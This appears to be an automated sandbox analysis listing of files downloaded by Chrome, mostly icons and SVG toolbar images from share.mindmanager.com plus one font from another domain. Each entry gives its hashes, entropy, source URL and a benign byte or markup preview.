                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:MS Windows icon resource - 4 icons, -128x-128, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                Category:downloaded
                                                                Size (bytes):90022
                                                                Entropy (8bit):1.6319346260719416
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:99D869FDDBB85476E62AD69024D8199E
                                                                SHA1:28A37DD6296C8D4FFB3909CEEB614916E7357F55
                                                                SHA-256:6D5E931723787163DE2DD2CEFF85728051FB77ACD5B00C6C6C958B558E905EFA
                                                                SHA-512:712AA6651871A0898A2774E337B8F42819D837C553F30149191E366A2351CA8D388786D1C77879C52277C8CAC7563B62811D4A62CDEA870B437E6F027E3A6777
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/ico/meta-tags.ico
                                                                Preview:............ .(...F......... .h...n... .... .........@@.... .(B..~...(............. ...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):524
                                                                Entropy (8bit):5.192624625659996
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:B1B94670E23F5AFAD3BF0E12A0E133E4
                                                                SHA1:6F9DDB4539C207DB248838AE5E28E8B87197E3F6
                                                                SHA-256:B2E98A4C454B002F1DF2D25FAFB056302451F6494F15E06E43166AA8B2498F51
                                                                SHA-512:C65160CED3C611B43840916932245B2733B109FBD0E815FAAB3D9E71EAB755F5FB055025A92AD6EFF2EF9352CFE1943951A5D6AD80C392543BEDA41CB7C683DC
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/toolbar/svg/context_table.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 15 13"><defs><style>.cls-1{fill:#fff;}.cls-2{fill:gray;}.cls-3{fill:none;stroke:gray;stroke-miterlimit:10;}</style></defs><title>Smart-Shape-Menu-Table</title><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><rect class="cls-1" x="0.5" y="0.5" width="14" height="12"/><path class="cls-2" d="M14,1V12H1V1H14m1-1H0V13H15V0Z"/><line class="cls-3" x1="7.5" y1="1" x2="7.5" y2="13"/><line class="cls-3" x1="14" y1="6.5" x2="1" y2="6.5"/></g></g></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):686
                                                                Entropy (8bit):5.314863995559606
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:C13569D95CF15312F47AB523E9DA66D9
                                                                SHA1:1FC3EBF29CFABA4419DFBA5A73D9437EFAB4B16C
                                                                SHA-256:1704CC63AE3487541FDC4ADBF2FEF42BFE4A500C80A962101F78E6C94E5D467D
                                                                SHA-512:47C5447A5202FF9351B5E8EE34812264937EB9E9171CB9362AFD5430BA1FF48DB38B41C73B7733B78358B6A3A07ED613C3DF21FC457539FACD1C114EA552B35E
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/publish-toolbar/svg/search-prev.svg
                                                                Preview:<?xml version="1.0" ?><!DOCTYPE svg PUBLIC '-//W3C//DTD SVG 1.1//EN' 'http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd'>.<svg enable-background="new 0 0 32 32" height="32px" version="1.1" viewBox="0 0 32 32" width="32px" xml:space="preserve" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">. <path clip-rule="evenodd" d="M31.106,15H3.278l8.325-8.293 c0.391-0.391,0.391-1.024,0-1.414c-0.391-0.391-1.024-0.391-1.414,0l-9.9,9.899c-0.385,0.385-0.385,1.029,0,1.414l9.9,9.9 c0.391,0.391,1.024,0.391,1.414,0c0.391-0.391,0.391-1.024,0-1.414L3.278,17h27.828c0.552,0,1-0.448,1-1 C32.106,15.448,31.658,15,31.106,15z" fill="#3A52A4" fill-rule="evenodd"/>.</svg>.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1012
                                                                Entropy (8bit):5.102534636974674
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:80D172E0FE7B7A9D79A685836C45B1F4
                                                                SHA1:BB0D3C4A0A2B7A26B3DC4A43492C770D497191F4
                                                                SHA-256:CE6C060D6E810BBC218E6A340D784451139864E83D7A7137215B2D431026A6AC
                                                                SHA-512:CCBF7F38C57639B20D9FEC8069C2E2EF5EE9FAE350FF024511145BEC9632BD501597B9B80A46DDB0BAD61CD40DC15C34593DA2B7780F41247A9DA23E7AA053BF
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/toolbar/svg/assets_add_relationship.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 27.28 23.7"><defs><style>.cls-1{fill:#96be7d;stroke:#63a558;stroke-miterlimit:10;}.cls-2{fill:#fff;}.cls-3{fill:#63a558;}</style></defs><title>web app toolbar assets add relationship</title><g id="Layer_2" data-name="Layer 2"><g id="Layer_2-2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><path class="cls-1" d="M21.81,10.7H6.57A3.11,3.11,0,0,1,3.45,8.26,3,3,0,0,1,6.38,4.7H21.3V6.34l4.53-2.73L21.3.89V2.7H5.68A5.12,5.12,0,0,0,.61,6.64,5,5,0,0,0,5.48,12.7H21.24a3.13,3.13,0,0,1,3.13,2.45,3,3,0,0,1-2.94,3.55H8.2a3.48,3.48,0,0,0-4.57-2.28,3.31,3.31,0,0,0-2,1.93A3.51,3.51,0,0,0,4.88,23.2,3.46,3.46,0,0,0,8.2,20.7H21.6a5.12,5.12,0,0,0,5.07-3.93A5,5,0,0,0,21.81,10.7Z"/><polygon class="cls-2" points="12.3 15.7 12.3 13.7 10.3 13.7 10.3 10.7 12.3 10.7 12.3 8.7 15.3 8.7 15.3 10.7 17.3 10.7 17.3 13.7 15.3 13.7 15.3 15.7 12.3 15.7"/><path class="cls-3" d="M14.8,9.2v2h2v2h-2v2h-2v-2h-2v-2h2v-2h2m1-1h-4v2h-2v4h2v2h4v-2h2v-4h-2v-2Z"/></g></
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:PNG image data, 50 x 38, 8-bit/color RGBA, non-interlaced
                                                                Category:downloaded
                                                                Size (bytes):1091
                                                                Entropy (8bit):7.67578125457365
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:42D1D7704EBE57E6E8365723E6BC2041
                                                                SHA1:F38D2499BADCDDDB1C1FD00DF50FEF1A285D2D47
                                                                SHA-256:862DC5A30CD05F253BFED03F867B2FA2E5A1EFBDF3007B028B71FDA0C445407D
                                                                SHA-512:428C9644A151667E902BE3AA9386A66CFA4562932F412E50820362DFD2E9703367A9158C2AF76B26047F95AAD6B0F2E617BF7BAB70082EE23227181FBDD9709A
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/icon-shape-oval.png
                                                                Preview:.PNG........IHDR...2...&......x.<....pHYs.................tEXtSoftware.Adobe ImageReadyq.e<....IDATx..?H.Q.._.......@&.P0..&].7Q..K[0......P...nA...@...H.R.K.N.l.L.v. .......q...%^...,....w...~....GUUaW...A\8..rmbd........\.L~...!rqqq....'......gggo.q.P.U..@TQ.W..lnnV...<===...[.Jtpp G&....5%1f..]...@]].;.....v1<<,......n..............9.......B7..-..022"....H$...>]..\.A..*.BW.e...KD.......J.i..6.1.1BLMM9.FV...%..dQ..HJu.............,..W. ....^.. .0......\.,2......A.D"..$.......,.O{{{ezu....V.g.,...r.X.9....*y.......w...0..cT........:<<..l....~...a.*\t...]L.....=6........Vcc.mf..f.RV.<j@...n........1.W...A...&...].bX.."....q.d.`...../.r9..q2.....e$..$_.O...e....Z[[..Aj....G..p....#...de.COIv0.....Q.!..1B....o..wr.RJ..zEuBMMM......y...hEq....1wb..S.Xk.R)......~K..J.7....f...x>==}nZGp.1. .[.......p.MApc............26.i....!.+++.!O.Bz...1A...k...E..}JK,...z.EK,,,... ..j...~...}_c.6X.% f....}..6.N<w..8YC...Xe..:.O..]...(.....$..9v.@..8!.N..j@....3.r.z.?".3
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1432
                                                                Entropy (8bit):5.107441350951775
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:B89F039A2DD69331906E66ED6AFD2509
                                                                SHA1:4062BC04B251F4F43C1A5355D3815AB4F8EB54DB
                                                                SHA-256:0A28BB58F768E2CCDF982F20E6C49CAE9E29EC8AE5454D385B53FC7E1A2B7B75
                                                                SHA-512:A0DA966246718ED1BF335EF317AF6DE3FD12E8017A09279C1D0BC3FF21C7DD9214CC145D9D62EE18F8D598934996BB09619A03FE72B0C896692B0E4C925DA48C
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/toolbar/svg/assets_paste.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><defs><style>.cls-1{fill:none;}.cls-1,.cls-5{stroke:gray;}.cls-1,.cls-2,.cls-3,.cls-5{stroke-miterlimit:10;}.cls-2{fill:#efc46f;}.cls-2,.cls-3{stroke:#b5863a;}.cls-3{fill:#e6e6e6;}.cls-4{fill:gray;}.cls-5{fill:#fff;}.cls-6{fill:#4f8ed4;}</style></defs><title>web app toolbar assets paste</title><g id="Layer_2" data-name="Layer 2"><g id="Layer_2-2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><rect class="cls-1" x="5.5" y="0.5" width="5" height="4" rx="2"/><rect class="cls-2" x="0.5" y="2.5" width="15" height="19" rx="2"/><rect class="cls-3" x="2.5" y="4.5" width="11" height="15" rx="1"/><rect class="cls-4" x="4" y="8" width="8" height="1"/><rect class="cls-4" x="4" y="10" width="8" height="1"/><rect class="cls-4" x="6" y="13" width="4" height="1"/><rect class="cls-4" x="6" y="15" width="4" height="1"/><path class="cls-5" d="M22.5,23.5h-9a1,1,0,0,1-1-1V9.5a1,1,0,0,1,1-1h6a1,1,0,0,1,.79.39l3,3.84a1,1,0,0,1,.21.61V22.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:PNG image data, 48 x 25, 8-bit/color RGBA, non-interlaced
                                                                Category:downloaded
                                                                Size (bytes):232
                                                                Entropy (8bit):6.317840428005857
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:F6B16434857C29FFD98CABD344040196
                                                                SHA1:ADF674C0099BAE5DED1812CBB64D186DC6F73FDA
                                                                SHA-256:2665A222B1921EAC12D3EE55F9CDEC9A7AB424E5FC13CEDBEBA3F1E34CF5848B
                                                                SHA-512:79C9EAF19B7997CDC6109B20566753B8F6811BCD45C5525125C94FDF0E9EC6C10150D77569253D3751E73000DF91225202F2718395177B860AE4188766C1D7E4
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/icon-shape-line.png
                                                                Preview:.PNG........IHDR...0.........w..y....pHYs.................tEXtSoftware.Adobe ImageReadyq.e<...uIDATx.b...?.)....i ....3....a..Q..4`$5.........XH.......p.....~4..z..$.8Z..&.Q..z`..........M...tP.u.Pn.=............F.......IEND.B`.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):540
                                                                Entropy (8bit):5.009079247536198
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:992DF625F927737A158213D9F3554D95
                                                                SHA1:562ABE32EC02C836382F76BE0ADED49FC593B8D6
                                                                SHA-256:987070C46A2370E528299623D6FB0F33080AA778A9CC4995D54C36E865A93F0A
                                                                SHA-512:883415F04199C1B57D8BF3F65275425B7604A13D3388E0421FA31AF2FA0C4FE843D612F9E012AB82DD6947BACC48AD57A705C34C477D74F8234BE3117DDA63E8
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/modern/topic_info_icon_info_card.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#fff;}.cls-2{fill:#3e9eff;}.cls-3{fill:none;stroke:#fff;stroke-miterlimit:10;stroke-width:2px;}</style></defs><title>topic_info_icon_info_card</title><rect class="cls-1" width="16" height="16" rx="2"/><rect class="cls-2" x="1" y="1" width="14" height="14" rx="2"/><line class="cls-3" x1="4" y1="5" x2="12" y2="5"/><line class="cls-3" x1="4" y1="8" x2="12" y2="8"/><line class="cls-3" x1="4" y1="11" x2="12" y2="11"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:PNG image data, 17 x 17, 8-bit colormap, non-interlaced
                                                                Category:downloaded
                                                                Size (bytes):734
                                                                Entropy (8bit):6.002965428873604
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:2DC0BE578ED361277E978541345A07A3
                                                                SHA1:D6217678C14CC00B5CA0717080932566CF290D1B
                                                                SHA-256:51DC064CA0E0F030AEE9E07894AFBC682AD9E6FC9DFA49F517088104CEB177D1
                                                                SHA-512:B8FBFB9C0887B323154729A84097D0A5D762502DD6BBC0C78CAF840E934A7323E2F211174ABBFB4A919857E9BF01148A41A29B36F53CD0CEE0412C03582AB947
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/icon-edit-small.png
                                                                Preview:.PNG........IHDR.....................gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....PLTE....}..}..}..}..}..}..}..}..}..}..}..}..}..}..}..}..}..}..}..}..}..}..}..}..}..}..}..}..}..}..}..}..}..}..}..}..}..}..}..}..}..}..}..}..}..}..}..}..}..}..}..}..}..}..}..}..}..}..}..}..}..}..}..}..}..}..}.....W....CtRNS...i}'.p...Dr..0.......q.......w......|..!.;W.N..S..y.v..........Y/..."....bKGDD........pHYs.................IDAT..M....0.....A..X.....{.w.r....f.7..@,.H.h`.L+...l...9...`.(.d.C.JU...h..r.!h4....j...u..F...O"..!...'S. ........la.?..0...\o.....?.Ox.?.......{.%.....%tEXtdate:create.2015-06-08T16:01:45+02:00ql.....%tEXtdate:modify.2015-06-08T16:01:45+02:00.18.....tEXtSoftware.Adobe ImageReadyq.e<....IEND.B`.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):3524
                                                                Entropy (8bit):4.391539568805549
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:E4236AAE9E176E4FE48C4250169BB2F9
                                                                SHA1:5E3D0068186CAD475381D0C6C913A0E6D247F7ED
                                                                SHA-256:370BDCED5A9797415A5938F1BEF24A65D9E2D5CFD2296FCB2FE13EA38E592573
                                                                SHA-512:81E3B4BFB8BBED519D391130C9FCD2E8FC40F6387FA00B44D85BBF058716340D019DEFCA3F2D0B87AFE91C5AB30F0288F3FAAAA2801DB67CEEF2D2DAFCC18D98
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/navigation-panel/mouse-zoom-cmd.svg
                                                                Preview:<svg width="141" height="70" viewBox="0 0 141 70" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0_314_4725)">.<path d="M44 22.5H5C2.51472 22.5 0.5 24.5147 0.5 27V41C0.5 43.4853 2.51472 45.5 5 45.5H44C46.4853 45.5 48.5 43.4853 48.5 41V27C48.5 24.5147 46.4853 22.5 44 22.5Z" stroke="#3B51A3"/>.<path d="M88 31L90.8868 26H85.1132L88 31ZM87.5 18V26.5H88.5V18H87.5Z" fill="#3B51A3"/>.<path d="M88 1L85.1132 6H90.8868L88 1ZM88.5 14V5.5H87.5V14H88.5Z" fill="#3B51A3"/>.<path fill-rule="evenodd" clip-rule="evenodd" d="M129.835 36.5769V17.4933C129.835 8.57519 122.134 1.34564 112.634 1.34564C103.134 1.34564 95.4334 8.5752 95.4334 17.4933V36.5769C95.4334 45.495 103.134 52.7245 112.634 52.7245C122.134 52.7245 129.835 45.495 129.835 36.5769ZM112.634 0C102.343 0 94 7.83203 94 17.4933V36.5769C94 46.2382 102.343 54.0702 112.634 54.0702C122.926 54.0702 131.268 46.2381 131.268 36.5769V17.4933C131.268 7.83201 122.926 0 112.634 0Z" fill="#3B51A3"/>.<path fill-rule="evenodd" clip-rule="
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):3562
                                                                Entropy (8bit):4.339651536239068
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:04894BDE4FDD19E8328A0C0C9AE17229
                                                                SHA1:A94D08A9E6A164B4B27903556584209F6ACD49D7
                                                                SHA-256:27DE8845AECA21540227D11FC3C89C715A8E1A71A307DEE958B9309B32B0412F
                                                                SHA-512:48B4AA2FC34DD3143DD86A84B9EEDFC6915084F5CA6028DDF73B790D9924330B21478F9D7076FB9111846AC576FE68B58D32147AA1CB4BBEF9371364AC430585
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/content-manager/remote-services/sharepoint.svg
                                                                Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 48 48" version="1.1" width="50px" height="50px">.<g id="surface1">.<path style="fill:none;stroke-width:2;stroke-linecap:butt;stroke-linejoin:miter;stroke:#1A237E;stroke-opacity:1;stroke-miterlimit:10;" d="M 29.539063 15.691406 C 34.128906 15.691406 37.847656 19.410156 37.847656 24 C 37.847656 28.589844 34.128906 32.308594 29.539063 32.308594 "/>.<path style=" fill:#0D47A1;" d="M 41 24 C 41 26.210938 39.210938 28 37 28 C 34.789063 28 33 26.210938 33 24 C 33 21.789063 34.789063 20 37 20 C 39.210938 20 41 21.789063 41 24 Z "/>.<path style=" fill:#0D47A1;" d="M 32 16 C 32 18.210938 30.210938 20 28 20 C 25.789063 20 24 18.210938 24 16 C 24 13.789063 25.789063 12 28 12 C 30.210938 12 32 13.789063 32 16 Z "/>.<path style=" fill:#0D47A1;" d="M 32 32 C 32 34.210938 30.210938 36 28 36 C 25.789063 36 24 34.210938 24 32 C 24 29.789063 25.789063 28 28 28 C 30.210938
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):243
                                                                Entropy (8bit):5.023794016810451
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:8B840314F7ECC4CFB56613750D70F939
                                                                SHA1:05F2CEAC1DB861ACEC9087EDB937F68D3F8B1974
                                                                SHA-256:77CBABA81A3CB7434632A84CA12294ACF0BD038075DD5EDC2F417AE5E4ABE22B
                                                                SHA-512:910054D23EC58DE3690ABEBCEB6883A401FA4435870BB711F553BF4346870ED1461B4F81BA3BE697A63D27F8CF41D1A5F9679368DB46FFF3290932928F50F0BC
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/IconsSVG/marker-3.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#fbb400;}</style></defs><title>heart_yellow_16 copy</title><polygon class="cls-1" points="0 0 8 0 16 8 8 16 0 16 0 0"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):442
                                                                Entropy (8bit):5.157343478333273
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:0A78810B257D82CF33D3355A29906A83
                                                                SHA1:5C09846D16486053063131B0D4D1A3FA2DD95D18
                                                                SHA-256:1626915BD0CAD52AD5DBF66AA654DB791BFF051018A2E7D46193E144D21169F2
                                                                SHA-512:AFEA38342F0139B6FC982E8CA393F843F68582718E715D1C93950429E94B5B7F3F5F857AFCB0DA7F52111A3D5D8A75CFB88EF17BB91691209C82F38BDE415BE7
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/IconsSVG/folder.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#fbcd58;}.cls-2{fill:#e5ac2e;}</style></defs><title>documents_6_16</title><rect class="cls-1" y="4" width="13" height="10" rx="2" ry="2"/><rect class="cls-1" y="2" width="10" height="6" rx="2" ry="2"/><path class="cls-2" d="M12.5,14H1a1,1,0,0,1-1-.9L3,5.9A1,1,0,0,1,4,5H15a1,1,0,0,1,1,.9l-2.5,7.2A1,1,0,0,1,12.5,14Z"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):586
                                                                Entropy (8bit):5.264043401717931
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:010C16C57D538BB921B7C70D4EDA8130
                                                                SHA1:B3A93A1C17B9DA685CED98CBA35047788C9649A5
                                                                SHA-256:A98795DA0CC3249C637B3DA4CBC05118D62752B0728D922894A99B051AF3E6AF
                                                                SHA-512:48E1482E03FC7BC0830BDC3E6D1E7A9B738AF3CED4859B0137138F9799FDEFA17AABC5B07980ACE8E6A19E6EF67063F0A1F3C9D7BACAC44F320677217311F45C
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/toolbar/svg/context_funnel_down.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 13"><defs><style>.cls-1{fill:#fff;}.cls-2{fill:gray;}.cls-3{fill:none;stroke:gray;stroke-miterlimit:10;}</style></defs><title>Smart-Shape-Menu-Hswim_1</title><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><polygon class="cls-1" points="5.34 12.5 0.73 0.5 15.27 0.5 10.66 12.5 5.34 12.5"/><path class="cls-2" d="M14.54,1,10.31,12H5.69L1.46,1H14.54M16,0H0L5,13h6L16,0Z"/><line class="cls-3" x1="1.75" y1="4.5" x2="13.75" y2="4.5"/><line class="cls-3" x1="3.75" y1="8.5" x2="11.75" y2="8.5"/></g></g></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):443
                                                                Entropy (8bit):5.2872579300808775
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:58D95F1C6AE98D0D7DA7B9723FBAD6FD
                                                                SHA1:FB7BA6822FA13E7EDEEB8B8DB32C91643C65DB61
                                                                SHA-256:AAB7C2D7368F785DFC4319AE1DBDAAB6A59E8B90487175497640975908201E2E
                                                                SHA-512:AC96BF8B621C32796BBCDBFAF0EB8453476D8ECEE21440DC9B1523D8E4CA9E73E41BCD75ED31F63AFC3F83684B81B558524721AC6E437B3C88432C16E963A24E
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/toolbar/objects/left-bracket.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 5.25 17"><defs><style>.cls-1{fill:none;stroke:gray;stroke-miterlimit:10;}</style></defs><title>background_shape_Asset 78</title><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><path class="cls-1" d="M5.2.5C1.57.86,3.27,6.55,2.06,7.76a2.14,2.14,0,0,1-1.94.72"/><path class="cls-1" d="M5.2,16.5c-3.63-.37-1.93-6.05-3.14-7.26A2.17,2.17,0,0,0,.12,8.51"/></g></g></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:Web Open Font Format (Version 2), TrueType, length 93276, version 1.0
                                                                Category:downloaded
                                                                Size (bytes):93276
                                                                Entropy (8bit):7.997636438159837
                                                                Encrypted:true
                                                                SSDEEP:
                                                                MD5:BCD7983EA5AA57C55F6758B4977983CB
                                                                SHA1:EF3A009E205229E07FB0EC8569E669B11C378EF1
                                                                SHA-256:6528A0BF9A836A53DFD8536E1786BA6831C9D1FAA74967126FDDF5B2081B858C
                                                                SHA-512:E868A2702CA3B99E1ABBCBD40B1C90B42A9D26086A434F1CBAE79DFC072216F2F990FEC6265A801BC4F96DB0431E8F0B99EB0129B2EE7505B3FDFD9BB9BAFE90
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://btee.pradjoun.com/efMPOlVSmxfcOmbADpC78I9nlNUI3iBkl92
                                                                Preview:wOF2......l\....... ..k...........................v...&..$?HVAR.j?MVAR.F.`?STAT.6'8.../.H........x....0..:.6.$..0. ..z...[....%"...........!.I.T....w.!c.H...t.]k......6..Cy..Ul.re........I..%.%....DE....v.i.QF8....iH.!r......P4Z[....Zs....o..r..8b.O....n...!......R}GL..5n!....^..I...A.....U...,&..uz....E.R.K/GL...#..U..A8%.rd..E,}...'e...u..3.dD....}..:..0.a..#O8.|.7..{.}.o......(.D..HX...w.;F...g.+....g.x..,.@~<.K......ZJw......^.!..{:..<..`N..h..0.t..NA..,...]........On./..X|_=...e,.tS..3Z..q_....'F[..jR.?U..k.:+;..Z.co5..l..yV.Md..4.6............L8q..._...AX.y.Cc...Agb..a.K...N....`-..N.b.u...q..i.S...p..j*...fA.......?.Z.Ee.~|.\..TZ._...?./a.64..+.]..(gq..d..\K...S..z.i.l[.........1=....I.....4g.?.G.3.&.0L&.$.@R6...U..o..:.S.=.....bU..u.]z.W8[U.|7.'.%..u...11..g<.^...J..PB.JHB...k........].($..D...S"u...7...9.8.....U..7...R$..x...g.X.zV.,.$....y.:.....Q$OM....q.. ...(.O....".d<.l..9..|^B.r.5......yi.D..._...<P..o....(Re.I...@E.~..T.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1383
                                                                Entropy (8bit):4.598950240151289
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:5E3EE203C6ED31D97A5EB0114865158B
                                                                SHA1:F7CA277853DF734AB02037920CCECB794BB4A4D3
                                                                SHA-256:E37EAC5C1B0252FA0048C2A4CFC5D0A3370AA7B18DFE912FF0FE5C4FE97A3B68
                                                                SHA-512:75910CAAE7C76C29923F555FDA37536D1FD25E9D98C91C3B0BFE8A0E03677EC9216B0BBAA87677483E43A0CC6017AC54B90F441494C7C0ED649DF4EF533C4B4E
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/content-manager/copy.svg
                                                                Preview:<svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0_352_9501)">.<path fill-rule="evenodd" clip-rule="evenodd" d="M6.66732 5.83301C6.20708 5.83301 5.83398 6.2061 5.83398 6.66634V13.333C5.83398 13.7932 6.20708 14.1663 6.66732 14.1663H13.334C13.7942 14.1663 14.1673 13.7932 14.1673 13.333V6.66634C14.1673 6.2061 13.7942 5.83301 13.334 5.83301H6.66732ZM4.83398 6.66634C4.83398 5.65382 5.6548 4.83301 6.66732 4.83301H13.334C14.3465 4.83301 15.1673 5.65382 15.1673 6.66634V13.333C15.1673 14.3455 14.3465 15.1663 13.334 15.1663H6.66732C5.6548 15.1663 4.83398 14.3455 4.83398 13.333V6.66634Z" fill="black"/>.<path fill-rule="evenodd" clip-rule="evenodd" d="M2.66732 1.83301C2.21013 1.83301 1.83398 2.20915 1.83398 2.66634V9.33301C1.83398 9.7902 2.21013 10.1663 2.66732 10.1663C2.94346 10.1663 3.16732 10.3902 3.16732 10.6663C3.16732 10.9425 2.94346 11.1663 2.66732 11.1663C1.65784 11.1663 0.833984 10.3425 0.833984 9.33301V2.66634C0.833984
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):39268
                                                                Entropy (8bit):4.368584434628909
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:0BF280FB53985760E7B1DE7281BB4307
                                                                SHA1:7655F3E75F5CC272A9E03EAECCD6C50762353C29
                                                                SHA-256:0E2698AD983EC2A3850B7D305BE00EF291D082C80E0848BAAFDC776036BBCDE2
                                                                SHA-512:A0C70F7C7EF8E34CE4341C8EC58D186AE31E5EA77F41425E3A3A377263CA92491E0BE54A30D144F3129EF4DA1B2995BACE2B4EBC00D16C2B38701F1B1098DDA5
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/cloud-templates/use-cases/banners/banner_general.svg
